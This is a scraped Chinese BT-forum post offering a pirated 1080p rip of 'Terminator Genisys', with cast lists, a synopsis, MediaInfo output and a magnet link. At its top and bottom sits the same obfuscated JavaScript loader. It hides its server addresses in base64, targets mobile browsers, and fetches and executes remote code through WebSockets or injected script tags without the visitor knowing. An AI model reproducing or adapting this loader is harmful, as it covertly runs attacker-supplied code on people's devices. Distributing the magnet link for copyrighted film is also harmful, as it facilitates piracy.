终结者:创世纪[中文字幕].Terminator.Genisys.2015.1080p.BluRay.x265.10bit.DTS 9.34GB

版主小s 25天前 169

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 终结者:创世纪 / 终结者5 / 未来战士:创世智能(港) / 魔鬼终结者:创世契机(台) / 终结者:创世 / 终结者:造物主 / Terminator 5 / Terminator: Genesis

◎片 名 Terminator Genisys

◎年 代 2015

◎产 地 美国

◎类 别 动作 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2015-08-23(中国大陆) / 2015-07-01(美国)

◎IMDb链接 https://www.imdb.com/title/tt1340138/

◎豆瓣评分 6.9/10 (138804人评价)

◎豆瓣链接 https://movie.douban.com/subject/3338862/

◎片 长 126分钟

◎导 演 阿兰·泰勒 Alan Taylor (id:1298974)

◎编 剧 莱塔·卡罗格里迪斯 Laeta Kalogridis (id:1049916)

帕特里克·卢西尔 Patrick Lussier (id:1315802)

詹姆斯·卡梅隆 James Cameron (id:1022571)

盖尔·安妮·赫德 Gale Anne Hurd (id:1040812)

◎演 员 阿诺·施瓦辛格 Arnold Schwarzenegger (id:1035643)

杰森·克拉克 Jason Clarke (id:1305193)

艾米莉亚·克拉克 Emilia Clarke (id:1314668)

杰·科特尼 Jai Courtney (id:1324668)

J·K·西蒙斯 J.K. Simmons (id:1147911)

戴奥·奥柯奈伊 Dayo Okeniyi (id:1338290)

马特·史密斯 Matt Smith (id:1197648)

考特尼·万斯 Courtney B. Vance (id:1031979)

李秉宪 Byeng-hun Lee (id:1105108)

迈克尔·盖拉迪斯 Michael J. X. Gladis (id:1322326)

何家蓓 Sandrine Holt (id:1040704)

韦恩·巴斯楚普 Wayne Bastrup (id:1213558)

格雷戈里·艾伦·威廉斯 Gregory Alan Williams (id:1350741)

奥托·桑切斯 Otto Sanchez (id:1350740)

马蒂·费拉罗 Matty Ferraro (id:1350739)

格里夫·弗斯特 Griff Furst (id:1049947)

伊恩·埃瑟里奇 Ian Etheridge (id:1351069)

诺兰·格罗斯 Nolan Gross (id:1341942)

塞思·梅里韦瑟 Seth Meriwether (id:1348141)

阿非莫·奥米拉 Afemo Omilami (id:1037024)

特瑞·韦伯 Teri Wyble (id:1339892)

凯莉·奥马利 Kerry O'Malley (id:1328847)

道格拉斯·史密斯 Douglas Smith (id:1009415)

陆建艺 Jianyi Lu (id:1334341)

斯塔莱特·米亚里奥尼 Starlette Miariaunii (id:1263801)

布莱恩特·普林斯 Bryant Prince (id:1333976)

布兰登·斯特西 Brandon Stacy (id:1206620)

道格拉斯·M·格里芬 Douglas M. Griffin (id:1093003)

特里·戴尔·帕克斯 Terry Dale Parks (id:1352071)

詹姆斯·摩西·布莱克 James Moses Black (id:1172632)

艾伦·威廉森 Aaron V. Williamson (id:1350440)

梅根·埃里森 Megan Ellison (id:1326156)

大卫·埃里森 David Ellison (id:1014408)

洛内·巴尔菲 Lorne Balfe (id:1032847)

罗杰·巴顿 Roger Barton (id:1421372)

苏珊·马瑟森 Susan Matheson (id:1450159)

卡洛斯·华达德 Carlos Ciudad (id:1414095)

劳伦·麦卡勒姆 Lauren McCallum (id:1416840)

◎标 签 科幻 / 阿诺·施瓦辛格 / 动作 / 美国 / 终结者 / 2015 / 经典 / 惊悚

◎简 介

天网拥有独立意识后,对创造它的人类展开血腥屠杀。此后的岁月,约翰·康纳(杰森·克拉科 Jason Clarke 饰)率领战友和天网的机器人大军进行着旷日持久的战争。在关键的一次战役过后,天网将终结者派往1984年的洛杉矶,企图杀害约翰的妈妈莎拉(艾米莉亚·克拉克 Emilia Clarke 饰)。而约翰则将自己最亲密的战友——同时也是他的生身父亲凯尔·里斯(杰·科特尼 Jai Courtney 饰)派往过去。凯尔刚刚抵达洛杉矶便遭到液态金属终结者T-1000(李秉宪 饰)的袭击。与此同时,“老爹”(阿诺·施瓦辛格 Arnold Schwarzenegger 饰)则与莎拉联手干掉了终结者T-800(阿诺·施瓦辛格 Arnold Schwarzenegger 饰)。

似乎过去的事情悄然改变,凯尔则从时间旅行中的遭遇得到灵感,与莎拉穿越来至2017年,尝试...

◎获奖情况 (共3项)

第17届美国青少年选择奖 (2015)

最佳暑期电影(提名)

最佳暑期电影女演员(提名)

└──艾米莉亚·克拉克 (id:1314668)

第2届豆瓣电影年度榜单 (2015)

8月最受关注电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 299929641114231272795362603476689534923 (0xE1A45903125F94045062202612F2BFCB)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.34 GiB

  8. Duration : 2 h 5 min

  9. Overall bit rate : 10.6 Mb/s

  10. Movie name : Terminator Genisys

  11. Encoded date : UTC 2021-11-01 16:54:09

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 5 min

  23. Bit rate : 9 058 kb/s

  24. Width : 1 920 pixels

  25. Height : 804 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.245

  33. Stream size : 7.95 GiB (85%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=13.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 2 h 5 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.33 GiB (14%)

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 58 min

  62. Bit rate : 41.3 kb/s

  63. Count of elements : 2867

  64. Stream size : 34.9 MiB (0%)

  65. Title : 简英

  66. Language : Multiple languages

  67. Default : No

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 58 min

  76. Bit rate : 21.3 kb/s

  77. Count of elements : 2867

  78. Stream size : 18.0 MiB (0%)

  79. Title : 简中

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Text #3

  84. ID : 5

  85. Format : PGS

  86. Muxing mode : zlib

  87. Codec ID : S_HDMV/PGS

  88. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration : 1 h 58 min

  90. Bit rate : 41.6 kb/s

  91. Count of elements : 2867

  92. Stream size : 35.1 MiB (0%)

  93. Title : 繁英

  94. Language : Multiple languages

  95. Default : No

  96. Forced : No


  97. Text #4

  98. ID : 6

  99. Format : PGS

  100. Muxing mode : zlib

  101. Codec ID : S_HDMV/PGS

  102. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration : 1 h 58 min

  104. Bit rate : 21.6 kb/s

  105. Count of elements : 2867

  106. Stream size : 18.2 MiB (0%)

  107. Title : 繁中

  108. Language : Chinese

  109. Default : No

  110. Forced : No


  111. Text #5

  112. ID : 7

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 58 min

  118. Bit rate : 22.9 kb/s

  119. Count of elements : 2834

  120. Stream size : 19.4 MiB (0%)

  121. Title : 英

  122. Language : English

  123. Default : No

  124. Forced : No


  125. Menu

  126. 00:00:00.000 : Chapter 01

  127. 00:07:40.334 : Chapter 02

  128. 00:14:20.734 : Chapter 03

  129. 00:20:31.563 : Chapter 04

  130. 00:27:48.416 : Chapter 05

  131. 00:34:54.801 : Chapter 06

  132. 00:41:02.626 : Chapter 07

  133. 00:46:28.786 : Chapter 08

  134. 00:53:05.515 : Chapter 09

  135. 01:01:00.239 : Chapter 10

  136. 01:08:22.556 : Chapter 11

  137. 01:14:43.812 : Chapter 12

  138. 01:21:31.261 : Chapter 13

  139. 01:31:01.706 : Chapter 14

  140. 01:38:42.750 : Chapter 15

  141. 01:45:41.084 : Chapter 16

  142. 01:52:48.970 : Chapter 17

  143. 01:58:00.114 : Chapter 18


TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:56FB3C11371BBD5467B036F8E5A2EC8E2115DE3A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};